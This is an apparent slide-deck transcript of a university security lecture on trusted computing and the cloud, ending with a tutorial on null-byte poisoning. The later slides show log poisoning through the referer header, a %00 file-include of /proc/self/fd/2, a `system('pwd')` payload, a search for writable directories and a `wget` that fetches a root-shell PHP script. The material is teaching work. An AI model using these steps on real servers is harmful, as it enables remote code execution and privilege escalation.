Trusted computing and the cloud. UNR – CSE, Jeff Naruchitparames 2 ( and null-byte poisoning attacks for the web )

Slides:



Advertisements
Similar presentations
Bypassing Client-Side Protection CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University
Advertisements

Ragib Hasan University of Alabama at Birmingham CS 491/691/791 Fall 2012 Lecture 2 08/21/2012 Security and Privacy in Cloud Computing.
Ragib Hasan Johns Hopkins University en Spring 2011 Lecture 3 02/14/2010 Security and Privacy in Cloud Computing.
1 MTvScan (Malware, Trojan, Viruses Scanner) Enterprise Class Security Scanner.
 Max Planck Institute for Software Systems Towards trusted cloud computing Nuno Santos, Krishna P. Gummadi, and Rodrigo Rodrigues MPI-SWS.
Security Issues and Challenges in Cloud Computing
CMSC 414 Computer and Network Security Lecture 12 Jonathan Katz.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
Ragib Hasan Johns Hopkins University en Spring 2010 Lecture 5 03/08/2010 Security and Privacy in Cloud Computing.
ASP.NET 2.0 Chapter 6 Securing the ASP.NET Application.
© 2003 School of Computing, University of Leeds SY32 Secure Computing, Lecture 14 Implementation Flaws Part 2: Malicious Input and Data Validation Issues.
C. Edward Chow Presented by Mousa Alhazzazi C. Edward Chow Presented by Mousa Alhazzazi Design Principles for Secure.
SaaS, PaaS & TaaS By: Raza Usmani
M.A.Doman Model for enabling the delivery of computing as a SERVICE.
 Proxy Servers are software that act as intermediaries between client and servers on the Internet.  They help users on private networks get information.
Addition to Networking.  There is no unique and standard definition out there  Cloud Computing is a general term used to describe a new class of network.
Designing Security In Web Applications Andrew Tomkowiak 10/8/2013 UW-Platteville Software Engineering Department
Software Engineering for Cloud Computing Rao, Feng 04/27/2011.
Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 
Threat Modeling for Cloud Computing (some slides are borrowed from Dr. Ragib Hasan) Keke Chen 1.
Cloud Computing Cloud Computing Class-1. Introduction to Cloud Computing In cloud computing, the word cloud (also phrased as "the cloud") is used as a.
Osama Shahid ( ) Vishal ( ) BSCS-5B
For more notes and topics visit:
1 Introduction to Cloud Computing Jian Tang 01/19/2012.
Cloud Computing & Security Issues Prepared by: Hamoud Al-Shammari CS 6910 Summer, 2011 University of Colorado at Colorado Springs Engineering & Applied.
Cloud Computing Kwangyun Cho v=8AXk25TUSRQ.
Trusted Computing BY: Sam Ranjbari Billy J. Garcia.
A Security Review Process for Existing Software Applications
Cloud computing.
Prepared By : Bhavin Tank(S.Y.B.Sc.(IT)) College of Computer Science & IT, Junagadh Cloud Computing.
1 © 2009 Cisco Systems, Inc. All rights reserved.Cisco Confidential Cloud Computing – The Value Proposition Wayne Clark Architect, Intelligent Network.
COMPUTER SECURITY MIDTERM REVIEW CS161 University of California BerkeleyApril 4, 2012.
Cloud Project. SaaS: Software-as-a-Service Also known as an on-demand software, SaaS is an application that can be accessed from anywhere on the world.
Google Application Engine Introduction Jim Eng with thanks to Charles Severance
PwC New Technologies New Risks. PricewaterhouseCoopers Technology and Security Evolution Mainframe Technology –Single host –Limited Trusted users Security.
Trusted Platform Module as Security Enabler for Cloud Infrastructure as a Service (IaaS). Gregory T. Hoffer CS7323 – Research Seminar (Dr. Qi Tian)
Speaker: Meng-Ting Tsai Date:2010/11/25 The Information Assurance Practices of Cloud Computing Vendors IEEE Communications Society.
Security fundamentals Topic 5 Using a Public Key Infrastructure.
1 Figure 9-3: Webserver and E-Commerce Security Importance of Webservice and E-Commerce Security  Cost of disruptions  The cost of loss of reputation.
CLOUD COMPUTING. What is cloud computing ??? What is cloud computing ??? Cloud computing is a general term for anything that involves delivering hosted.
National IT Industry Promotion Agency E-document System Team.
Security Attacks Tanenbaum & Bo, Modern Operating Systems:4th ed., (c) 2013 Prentice-Hall, Inc. All rights reserved.
COMP2322 Lab 4 Socket Programming Toby Lam March 2, 2016.
Session 11: Cookies, Sessions ans Security iNET Academy Open Source Web Development.
Technical Security Issues in Cloud Computing By: Meiko Jensen, Jorg Schwenk, Nils Gruschka, Luigi Lo Lacono Presentation by: Winston Tong 2009 IEEE.
Chapter 11 – Cloud Application Development. Contents Motivation. Connecting clients to instances through firewalls. Cloud Computing: Theory and Practice.
CLOUD ARCHITECTURE Many organizations and researchers have defined the architecture for cloud computing. Basically the whole system can be divided into.
Threat Modeling for Cloud Computing
Chapter 6: Securing the Cloud
By: Raza Usmani SaaS, PaaS & TaaS By: Raza Usmani
The Future? Or the Past and Present?
Manuel Brugnoli, Elisa Heymann UAB
Windows Server 2016 Secure IaaS Microsoft Build /1/2018 4:00 AM
Cloud computing-The Future Technologies
Recommendation 6: Using ‘cloud computing’ to meet the societal need ‘Faster and transparent access to public sector services’ Cloud computing Faster and.
Outline What does the OS protect? Authentication for operating systems
A Security Review Process for Existing Software Applications
Topic 1: Data, information, knowledge and processing
Outline What does the OS protect? Authentication for operating systems
Company Overview & Strategy
Uses Of Encryption Algorithms
Defense in Depth Web Server Custom HTTP Handler Input Validation
Cloud computing Technology: innovation. Points  Cloud Computing and Social Network Sites have become major trends not only in business but also in various.
Cloud computing Technology: innovation. Points  Cloud Computing and Social Network Sites have become major trends not only in business but also in various.
Distributed Systems through Web Services
Fundamental Concepts and Models
ONLINE SECURE DATA SERVICE
Enterprise Class Security Scanner
Presentation transcript:

Trusted computing and the cloud

UNR – CSE, Jeff Naruchitparames 2 ( and null-byte poisoning attacks for the web )

UNR – CSE, Jeff Naruchitparames 3 Computer architecture Security... privacy Digital & physical threats

UNR – CSE, Jeff Naruchitparames 4 1. Identification – cryptographic 2. Attestation – digital signatures 3. Normal operating environment – from the computer's environment (remotely, too!)

UNR – CSE, Jeff Naruchitparames 5

6 Control!

UNR – CSE, Jeff Naruchitparames 7 Trusted platform module (TPM) Trusted computing group (TCG) Root of trust Dictate accessibility (permissions) a user has

UNR – CSE, Jeff Naruchitparames 8 But wait! … this is not a bad thing

UNR – CSE, Jeff Naruchitparames 9

Software as a Service, SaaS Platform as a Service, PaaS Infrastructure as a Service, IaaS

UNR – CSE, Jeff Naruchitparames 11 Problem: Storage Solution: Encryption, duh! Problem: Processing/computation of information Solution: ???

UNR – CSE, Jeff Naruchitparames 12 Without looking!

UNR – CSE, Jeff Naruchitparames 13 Blind processing Ensuring security and in particular, privacy of information from third parties (sys admins, users, hackers, etc)

UNR – CSE, Jeff Naruchitparames 14 Why so important? ISPs Power grid owners Google, Amazon, other web 2.0 companies, etc Political, economic, competition, etc

UNR – CSE, Jeff Naruchitparames 15 Technical details for another day... Null-byte poisoning attacks (null- byte injection)

UNR – CSE, Jeff Naruchitparames 16 Add URL-encoded null-byte characters (%00, 0x00) to user-supplied data Bypass input sanity checking filters

UNR – CSE, Jeff Naruchitparames 17 javascript, ASP Processing accomplished by C/C++ functions

UNR – CSE, Jeff Naruchitparames 18 NULL = string termination or delimiter = stop processing a string = bytes following delimiter will be ignored

UNR – CSE, Jeff Naruchitparames 19 If a string loses its null character, the length of the string = unknown... … until memory pointer finds the next null byte.

UNR – CSE, Jeff Naruchitparames 20 /web/htdocs/foo/ Template file includes, yay!

UNR – CSE, Jeff Naruchitparames 21 Inject shellcode via symbolic links from /proc/self/. This example assumes Apache error logs are located in /proc/self/fd/2 Now what?

UNR – CSE, Jeff Naruchitparames 22 Note: Error logs are typically written without filtering referer variables (from browsers) curl “ -H “Host:” -- referer “ ” [Mon Feb 08 09:27: ] [error] [client x.x.x.x] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /, referer:

UNR – CSE, Jeff Naruchitparames 23 d/2%00&cmd=system('pwd') Write issues?! (permissions)

UNR – CSE, Jeff Naruchitparames Type d -perm 0777') Assume we find a writable directory at: /home/user/public_html/php_fi les_for_school/

UNR – CSE, Jeff Naruchitparames 25 Injection time! /fd/2%00&cmd=system('wget -O /home/user/public_html/php_files_for_school/home work3.php obtain_root_access/get_root_shell.php'); Privilege escalation

UNR – CSE, Jeff Naruchitparames 26 Responsible disclosure! YEAH

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.